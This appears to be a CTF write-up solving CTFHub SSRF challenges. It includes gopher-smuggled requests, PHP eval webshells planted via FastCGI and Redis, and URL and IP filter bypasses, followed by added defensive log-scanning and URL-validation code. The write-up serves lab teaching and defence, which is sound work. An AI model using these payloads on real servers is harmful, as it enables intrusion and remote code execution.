WHCSRL 技术网

CTFHub Web SSRF Exercises

Basics

Internal Network Access

Challenge description: try to access flag.php located at 127.0.0.1.

Visiting the target address, we see that /?url=_ has been appended to the URL.
Then access 127.0.0.1/flag.php through that parameter.

Payload: ?url=127.0.0.1/flag.php

Reading Files via Pseudo-Protocols

Challenge description: try to read flag.php in the web directory.

The pseudo-protocol most often used in SSRF is file:///; in an SSRF it can be used to read PHP source code.

Payload: ?url=file:///var/www/html/flag.php

Then view the page source to see the file contents.

Port Scanning

Challenge description: come and scan ports with sexy CTFHub online; the port range is said to be 8000-9000.

The dict protocol can be used in SSRF to probe for open ports.

Payload: ?url=dict://127.0.0.1:8000

Use Burp Suite to brute-force the port number; the hint says the port is in the range 8000-9000.

Port 8566 returns a response length different from the other ports.
Then access port 8566.

Payload: ?url=127.0.0.1:8566

Exploiting the Gopher Protocol

POST Request

Challenge description: this time send an HTTP POST request. By the way, the SSRF is implemented with PHP's curl and follows 302 redirects. Good luck, kid.

Following the hint, capture the request to 302.php: there is no service there.

Try accessing flag.php.
Accessing flag.php from the internal address reveals key=e42236c6f932a86af6eaa1f0ca77e0de

?url=127.0.0.1/flag.php

We need to use the gopher protocol to POST the key to flag.php, but note that the data has to be sent from 127.0.0.1. Usage: gopher://ip:port/_payload

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
# Note: Content-Length must equal the length of your POST body

URL-encode this three times (note: after the first URL-encoding, manually insert %0D before every %0A, then do the remaining encodings):

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de

Construct the payload:

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=e42236c6f932a86af6eaa1f0ca77e0de

This returns the flag.
Script to build the POST request over gopher:

import urllib.parse

# Raw HTTP request to smuggle through gopher
payload = """POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=e42236c6f932a86af6eaa1f0ca77e0de
"""
# Note: the string must end with a newline; the trailing newline marks the end of the HTTP request
tmp = urllib.parse.quote(payload)              # first URL-encoding
new = tmp.replace('%0A', '%0D%0A')             # turn LF into CRLF so the server sees proper HTTP line endings
result = 'gopher://127.0.0.1:80/' + '_' + new  # the gopher item type '_' precedes the payload
result = urllib.parse.quote(result)            # second URL-encoding, because the value travels in a GET parameter
print(result)

Result:

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253De42236c6f932a86af6eaa1f0ca77e0de%250D%250A

File Upload

Reference: https://www.jianshu.com/p/a9e5a64b733b

Challenge description: this time you need to upload a file to flag.php. Good luck.

Visiting the target address shows a blank page; trying flag.php says it must be accessed locally.
Access flag.php from the target's own loopback address:

?url=127.0.0.1/flag.php

This gives the file upload page.

Read the source of flag.php with the file pseudo-protocol:

Payload: ?url=file:///var/www/html/flag.php

flag.php

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

The code only checks that the uploaded file is non-empty, so upload any non-empty file. The page has no submit button, so add one manually in the F12 developer tools:

<input type="submit" name="submit" >

Upload the file and intercept the request with Burp.
Change the Host value to 127.0.0.1:80, URL-encode the captured request once, replace %0A with %0D%0A, then URL-encode it twice more. Just run it through the script:

import urllib.parse

# Captured multipart upload request, with Host rewritten to 127.0.0.1:80
payload = """POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------92335795416210780092655892737
Content-Length: 395
Origin: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-6af7ed5071d80457.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php 
    @eval($_POST["pass"]);
?> 
-----------------------------92335795416210780092655892737
Content-Disposition: form-data; name="submit"

提交查询
-----------------------------92335795416210780092655892737--
"""
# Note: the string must end with a newline; the trailing newline marks the end of the HTTP request
tmp = urllib.parse.quote(payload)              # first URL-encoding
new = tmp.replace('%0A', '%0D%0A')             # turn LF into CRLF
result = 'gopher://127.0.0.1:80/' + '_' + new
result = urllib.parse.quote(result)            # second URL-encoding, because the value travels in a GET parameter
print(result)

Output:

gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A90.0%2529%2520Gecko/20100101%2520Firefox/90.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------340238428019634687501146349694%250D%250AContent-Length%253A%2520394%250D%250AOrigin%253A%2520http%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-973c40c4217366cd.sandbox.ctfhub.com%253A10800/%253Furl%253D127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------340238428019634687501146349694%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%250D%250A%2520%2520%2520%2520%2540eval%2528%2524_POST%255B%2522pass%2522%255D%2529%253B%250D%250A%253F%253E%2520%250D%250A-----------------------------340238428019634687501146349694%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------340238428019634687501146349694--%250D%250A

Pass the parameter and get the flag.

FastCGI Protocol

Challenge description: this time we need to attack the FastCGI protocol. Perhaps the attached article will help.

Gopherus tool: https://github.com/tarunkant/Gopherus.git
Reference: https://blog.csdn.net/mysteryflower/article/details/94386461

If port 9000 is open, the SSRF vulnerability may exist and may lead to RCE. To exploit it, you need to supply the name of a file that is guaranteed to exist on the target host (preferably a .php file).

?url=file:///var/www/html/index.php

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

/var/www/html/index.php exists on the target server.

Prepare a one-line webshell, <?php @eval($_POST['x']);?>, saved in the file tmp.php.

Construct the terminal command to execute: decode the webshell and write it to a file named shell.php.

echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Generate the payload with the Gopherus tool:

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit fastcgi

  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /var/www/html/index.php
Terminal command to run:  echo "PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==" | base64 -d > shell.php

Your gopher link is ready to do SSRF: 

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH119%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00w%04%00%3C%3Fphp%20system%28%27echo%20%22PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg%3D%3D%22%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------

URL-encode it and pass it in the url parameter:

?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%39%30%30%30%2f%5f%25%30%31%25%30%31%25%30%30%25%30%31%25%30%30%25%30%38%25%30%30%25%30%30%25%30%30%25%30%31%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%34%25%30%30%25%30%31%25%30%31%25%30%35%25%30%35%25%30%30%25%30%46%25%31%30%53%45%52%56%45%52%5f%53%4f%46%54%57%41%52%45%67%6f%25%32%30%2f%25%32%30%66%63%67%69%63%6c%69%65%6e%74%25%32%30%25%30%42%25%30%39%52%45%4d%4f%54%45%5f%41%44%44%52%31%32%37%2e%30%2e%30%2e%31%25%30%46%25%30%38%53%45%52%56%45%52%5f%50%52%4f%54%4f%43%4f%4c%48%54%54%50%2f%31%2e%31%25%30%45%25%30%33%43%4f%4e%54%45%4e%54%5f%4c%45%4e%47%54%48%31%32%33%25%30%45%25%30%34%52%45%51%55%45%53%54%5f%4d%45%54%48%4f%44%50%4f%53%54%25%30%39%4b%50%48%50%5f%56%41%4c%55%45%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%25%32%30%25%33%44%25%32%30%4f%6e%25%30%41%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%25%32%30%25%33%44%25%32%30%25%30%41%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%25%32%30%25%33%44%25%32%30%70%68%70%25%33%41%2f%2f%69%6e%70%75%74%25%30%46%25%31%37%53%43%52%49%50%54%5f%46%49%4c%45%4e%41%4d%45%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78%2e%70%68%70%25%30%44%25%30%31%44%4f%43%55%4d%45%4e%54%5f%52%4f%4f%54%2f%25%30%30%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%34%25%30%30%25%30%31%25%30%30%25%30%30%25%30%30%25%30%30%25%30%31%25%30%35%25%30%30%25%30%31%25%30%30%25%37%42%25%30%34%25%30%30%25%33%43%25%33%46%70%68%70%25%32%30%73%79%73%74%65%6d%25%32%38%25%32%37%65%63%68%6f%25%32%30%25%32%32%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6f%4a%46%39%51%54%31%4e%55%57%79%64%34%4a%31%30%70%4f%7a%38%25%32%42%43%67%25%33%44%25%33%44%25%32%32%25%32%30%25%37%43%25%32%30%62%61%73%65%36%34%25%32%30%2d%64%25%32%30%25%33%45%25%32%30%73%68%65%6c%6c%2e%70%68%70%25%32%37%25%32%39%25%33%42%64%69%65%25%32%38%25%32%37%2d%2d%2d%2d%2d%4d%61%64%65%2d%62%79%2d%53%70%79%44%33%72%2d%2d%2d%2d%2d%25%30%41%25%32%37%25%32%39%25%33%42%25%33%46%25%33%45%25%30%30%25%30%30%25%30%30%25%30%30

shell.php has now been written to /var/www/html on the server.

/shell.php

x=system('cat /flag_bb4ae17f50829d327b60b4f752bc438d');

ctfhub{e028c80e91de1a8e7220d506}

Redis Protocol

Challenge description: this time attack the Redis protocol: redis://127.0.0.1:6379. Materials? No materials! Find them yourself!

Summary of Redis vulnerabilities: https://www.freebuf.com/articles/web/249238.html

This mainly exploits unauthenticated Redis access: writing an ssh-keygen public key to log in, using cron jobs for a reverse shell, writing a webshell directly, or getting a shell through master-slave replication.

Method 1: by hand

First use the dict protocol to probe whether Redis is listening on port 6379:
url=dict://127.0.0.1:6379

Check whether authentication is required:
url=dict://127.0.0.1:6379/info

It is there; next, set the dump directory (dir):
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html

Then write the shell, usually in hex:
url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x40\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php @eval($_POST[a]);?>

url=dict://127.0.0.1:6379/set:shell:"\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x61\x5d\x29\x3b\x3f\x3e"
<?php eval($_POST[a]);?>

Set the file name:
url=dict://127.0.0.1:6379/set:dbfilename:atkx.php

Finally, save:
url=dict://127.0.0.1:6379/save

This doesn't seem to work for this challenge; I could never get it to reproduce, whereas on ctfshow web360 both methods work.

Method 2: just use the tool

┌──(kali㉿kali)-[~/桌面/Python/SSRF/Gopherus]
└─$ python gopherus.py --exploit redis


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

                author: $_SpyD3r_$


Ready To get SHELL

What do you want?? (ReverseShell/PHPShell): php

Give web root location of server (default is /var/www/html): 
Give PHP Payload (We have default PHP Shell): <?php eval($_POST[atkx]); ?>

Your gopher link is Ready to get PHP Shell: 

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Batkx%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. 

-----------Made-by-SpyD3r-----------

Encode it once more:

?url=gopher://127.0.0.1:6379/_%25%32%41%31%25%30%44%25%30%41%25%32%34%38%25%30%44%25%30%41%66%6c%75%73%68%61%6c%6c%25%30%44%25%30%41%25%32%41%33%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%25%30%44%25%30%41%31%25%30%44%25%30%41%25%32%34%33%32%25%30%44%25%30%41%25%30%41%25%30%41%25%33%43%25%33%46%70%68%70%25%32%30%65%76%61%6c%25%32%38%25%32%34%5f%50%4f%53%54%25%35%42%61%74%6b%78%25%35%44%25%32%39%25%33%42%25%32%30%25%33%46%25%33%45%25%30%41%25%30%41%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%64%69%72%25%30%44%25%30%41%25%32%34%31%33%25%30%44%25%30%41%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%25%30%44%25%30%41%25%32%41%34%25%30%44%25%30%41%25%32%34%36%25%30%44%25%30%41%63%6f%6e%66%69%67%25%30%44%25%30%41%25%32%34%33%25%30%44%25%30%41%73%65%74%25%30%44%25%30%41%25%32%34%31%30%25%30%44%25%30%41%64%62%66%69%6c%65%6e%61%6d%65%25%30%44%25%30%41%25%32%34%39%25%30%44%25%30%41%73%68%65%6c%6c%2e%70%68%70%25%30%44%25%30%41%25%32%41%31%25%30%44%25%30%41%25%32%34%34%25%30%44%25%30%41%73%61%76%65%25%30%44%25%30%41%25%30%41

Connect to the webshell:

/shell.php

atkx=system('cat /flag_56381dbdb8879c071fdbd8b47e044436');

ctfhub{3f364bbf61aa400455122885}
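The gopher, FastCGI and Redis sections above all rely on the same mechanism: a url= value that the web server decodes once and that curl decodes a second time before writing it verbatim to a raw socket. The script below is an added example for the defender's side of that and is not part of the original writeup or of Gopherus: it peels the encoding layers off a logged url= parameter, recovers the smuggled request, and flags non-http schemes, loopback targets and the Redis and FastCGI ports over a few constructed access-log lines. The sample log, the regexes and the function names are all constructed for this example.

```python
"""Added example (not from the original writeup): decode nested URL-encoding
in logged ?url= parameters and flag SSRF indicators. All inputs are constructed."""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (combined log format) for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /?url=127.0.0.1/flag.php HTTP/1.1" 200 41
10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "GET /?url=file:///var/www/html/flag.php HTTP/1.1" 200 312
10.0.0.5 - - [01/Jan/2024:00:00:03 +0000] "GET /?url=dict://127.0.0.1:6379/info HTTP/1.1" 200 1200
10.0.0.5 - - [01/Jan/2024:00:00:04 +0000] "GET /?url=gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250A%250D%250Akey%253Dabc HTTP/1.1" 200 57
10.0.0.5 - - [01/Jan/2024:00:00:05 +0000] "GET /?url=http://notfound.ctfhub.com/ HTTP/1.1" 200 91
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
URL_PARAM_RE = re.compile(r'[?&]url=([^&\s"]*)')
NON_HTTP_SCHEMES = {"gopher", "dict", "file"}        # schemes used in the writeup
SENSITIVE_PORTS = {6379: "redis", 9000: "fastcgi"}    # services targeted in the writeup


def peel_encoding(value, max_layers=5):
    """URL-decode repeatedly until the text stops changing.
    Returns (decoded_text, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def analyse_target(url):
    """Classify one url= value as the vulnerable handler sees it (already decoded
    once by the web server). Returns the findings and, for gopher, the first
    line of the smuggled request that curl would write to the socket."""
    if "://" not in url:
        url = "http://" + url                      # curl treats scheme-less input as http
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    findings = []
    if scheme in NON_HTTP_SCHEMES:
        findings.append(f"non-http scheme {scheme}")
    host = parts.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_private:
            findings.append(f"internal target {ip}")
    except ValueError:
        pass                                       # a hostname, not an IP literal
    try:
        port = parts.port
    except ValueError:
        port = None
    if port in SENSITIVE_PORTS:
        findings.append(f"port {port} ({SENSITIVE_PORTS[port]})")
    smuggled = None
    if scheme == "gopher" and parts.path.startswith("/_"):
        # gopher://host:port/_<data>: '_' is the gopher item type; the rest is
        # URL-decoded once more by curl and sent as-is, so decode it here too.
        data, extra_layers = peel_encoding(parts.path[2:])
        smuggled = data.split("\r\n")[0]
        findings.append(f"gopher payload ({extra_layers} extra encoding layer(s)) "
                        f"starting with {smuggled!r}")
    return {"url": url, "findings": findings, "smuggled": smuggled}


def scan_log(text):
    """Return one record per log line whose url= parameter produced findings."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for raw in URL_PARAM_RE.findall(m.group("path")):
            record = analyse_target(unquote(raw))  # the server decodes the query once
            if record["findings"]:
                record["line"] = line_no
                hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['url']}")
        for finding in hit["findings"]:
            print(f"    - {finding}")
```

Line 5 of the sample log (a plain http request to an external host) produces no record; the other four are reported, and for the gopher line the decoded first line "POST /flag.php HTTP/1.1" is what an analyst needs to see to recognise the POST-smuggling technique from the writeup.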

Bypass

URL Bypass

Challenge description: the requested URL must contain http://notfound.ctfhub.com; try using some quirks of URL syntax to bypass this restriction.

Methods:

1. Use ? to bypass the restriction: url=https://www.baidu.com?www.xxxx.me
2. Use @ to bypass the restriction: url=https://www.baidu.com@www.xxxx.me
3. Use slashes and backslashes to bypass the restriction
4. Use # to bypass the restriction: url=https://www.baidu.com#www.xxxx.me
5. Use a subdomain to bypass it
6. Use a malformed URL to bypass it
7. Use a redirect to the IP to bypass it

The challenge requires url must startwith "http://notfound.ctfhub.com".
We can use @ to bypass this. For example, http://whoami@127.0.0.1 actually connects to the site 127.0.0.1 with the username whoami, so the requests http://notfound.ctfhub.com@127.0.0.1 and http://127.0.0.1 are equivalent: both return the content of 127.0.0.1.

So construct the URL directly and get the flag.

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

ctfhub{b808a23b0267eb37a9cf2d47}

Numeric IP Bypass

Challenge description: this time 127 and 172 are banned, so dotted-decimal IPs cannot be used, yet 127.0.0.1 still has to be reached. What now?

?url=http://127.0.0.1/flag.php
127 is banned, so bypass it with a different number base.

127.0.0.1

Decimal: 2130706433
Hexadecimal: 0x7F000001

payload:

?url=http://2130706433/flag.php
?url=http://0x7F000001/flag.php

ctfhub{6c7da22b915e514a2166ebc8}

302 Redirect Bypass

Challenge description: an important point about SSRF is that the request may follow 302 redirects; try using this to bypass the IP check and reach flag.php at 127.0.0.1.

With no VPS available, start a target machine on BUU and create ssrf.php in its /var/www/html directory:

<?php 
header("Location: http://127.0.0.1/flag.php");
?>

Then put the address of that file in the payload:

?url=http://challenge-ecc5d8e674ef2aa4.sandbox.ctfhub.com:10800/?url=http://54899ba5-ce14-4afa-a744-c342f2cc5361.node4.buuoj.cn:81/ssrf.php

ctfhub{44d10798e3a02163751e39ee}

DNS Rebinding Bypass

Register an account at http://ceye.io/; you will be assigned a domain. Edit its DNS rebinding records as follows: fill in the first one with anything, and for the second write

An introduction to DNS rebinding: https://zhuanlan.zhihu.com/p/89426041

Configure it as described, then use the domain.

Payload: url=http://r.xxxxxx/flag.php
# xxx is the domain assigned to you

ctfhub{89904fb53a36e3df04691243}
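Each of the four bypass sections above defeats a check that looks at the URL as a string: a prefix match, a "127." filter, a check made before the redirect is followed, and a check made before a second DNS lookup. The code below is an added example, not part of the original writeup, of a destination check that parses the URL instead: it rejects non-http schemes and userinfo, normalises numeric IPv4 forms (going beyond the decimal and hex cases in the text to the whole inet_aton family, including octal and short dotted forms), matches the hostname against an allowlist, resolves it once and hands the resolved address back for the caller to pin, and re-runs the same check on every Location header rather than letting the client follow it. The allowlist, the fake resolver, the 1.2.3.4 address and the sample URLs are constructed for the example.

```python
"""Added example (not from the original writeup): an SSRF destination check
that closes the userinfo, numeric-IP, redirect and DNS-rebinding bypasses.
Allowlist, resolver data and sample URLs are constructed."""
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
HEX_DIGITS = set("0123456789abcdefABCDEF")


def parse_numeric_ipv4(host):
    """Parse the inet_aton-style forms that a '127.' string filter misses
    (2130706433, 0x7F000001, 0177.0.0.1, 127.1). Returns IPv4Address or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        try:
            if p[:2].lower() == "0x" and p[2:] and set(p[2:]) <= HEX_DIGITS:
                v = int(p[2:], 16)
            elif p.isascii() and p.isdigit() and len(p) > 1 and p[0] == "0":
                v = int(p, 8)                       # leading zero means octal
            elif p.isascii() and p.isdigit():
                v = int(p, 10)
            else:
                return None                         # not a numeric component
        except ValueError:
            return None
        values.append(v)
    last_width = 8 * (5 - len(parts))               # the last part fills the remaining bytes
    if any(v > 255 for v in values[:-1]) or values[-1] >= 1 << last_width:
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    return ipaddress.IPv4Address((addr << last_width) | values[-1])


def is_internal(ip):
    """Address ranges the fetcher must never reach."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def system_resolver(host):
    """Resolve with the OS resolver (needs network); returns a set of IP objects."""
    return {ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)}


def validate_target(url, allowed_hosts, resolver=system_resolver):
    """Return (hostname, pinned_ip) if url may be fetched, else raise ValueError.
    The caller must connect to pinned_ip and send hostname in the Host header;
    resolving again at connect time is exactly what DNS rebinding abuses."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")   # file:, dict:, gopher:
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")                     # allowed.host@127.0.0.1
    host = (parts.hostname or "").lower()
    if not host:
        raise ValueError("missing host")
    literal = parse_numeric_ipv4(host)
    if literal is None:
        try:
            literal = ipaddress.ip_address(host)                      # e.g. an IPv6 literal
        except ValueError:
            literal = None
    if literal is not None:
        raise ValueError(f"IP literal not allowed: {literal}")
    if host not in allowed_hosts:
        raise ValueError(f"host not in allowlist: {host}")
    ips = resolver(host)
    if not ips or any(is_internal(ip) for ip in ips):
        raise ValueError(f"{host} resolves to an internal address")
    return host, sorted(ips, key=str)[0]


# Constructed data for the demonstration: an allowlist and a fake DNS table in
# which partner.example has been rebound to loopback.
ALLOWED = {"notfound.ctfhub.com", "partner.example"}
FAKE_DNS = {
    "notfound.ctfhub.com": {ipaddress.ip_address("1.2.3.4")},   # constructed public address
    "partner.example": {ipaddress.ip_address("127.0.0.1")},
}


def fake_resolver(host):
    return FAKE_DNS.get(host, set())


def verdict(url, redirected_from=None):
    """Decision string for one URL. A Location header is resolved against the
    page that issued the redirect and then checked like any other target."""
    if redirected_from is not None:
        url = urljoin(redirected_from, url)
    try:
        host, ip = validate_target(url, ALLOWED, fake_resolver)
        return f"allow {host} -> {ip}"
    except ValueError as e:
        return f"deny ({e})"


if __name__ == "__main__":
    for u in ["http://notfound.ctfhub.com/flag.php",
              "http://notfound.ctfhub.com@127.0.0.1/flag.php",
              "http://2130706433/flag.php", "http://0x7F000001/flag.php",
              "http://0177.0.0.1/flag.php", "file:///var/www/html/flag.php",
              "dict://127.0.0.1:6379/info", "http://partner.example/"]:
        print(f"{u:48} {verdict(u)}")
    print(verdict("http://127.0.0.1/flag.php", redirected_from="http://notfound.ctfhub.com/ssrf.php"))
```

The returned address is the one the fetch must actually connect to, with the hostname sent in the Host header; looking the name up a second time at connect time reopens the rebinding window. The HTTP client should also be configured not to follow redirects on its own (in the writeup's index.php that is the CURLOPT_FOLLOWLOCATION setting), so that every hop goes through validate_target as the redirected_from case shows.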
